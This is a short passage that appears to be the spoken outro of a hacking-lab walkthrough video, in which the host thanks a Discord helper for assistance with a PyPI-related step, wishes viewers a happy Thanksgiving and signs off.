other thing that I'd like to throw out there is thanks to Discord, OXDC9 helped me out on this box a lot when I first got into it. Those snares on pypi, it's not my expertise. So it was really nice to have a hand in that one. Did not do it alone. It's a great community, great box. This is Thanksgiving weekend in America, so if you're in America, be grateful for your family. If you're around the world, be grateful for all your family. Everybody stay safe and keep hacking, and I'll hope to see you guys next week with another box. Later.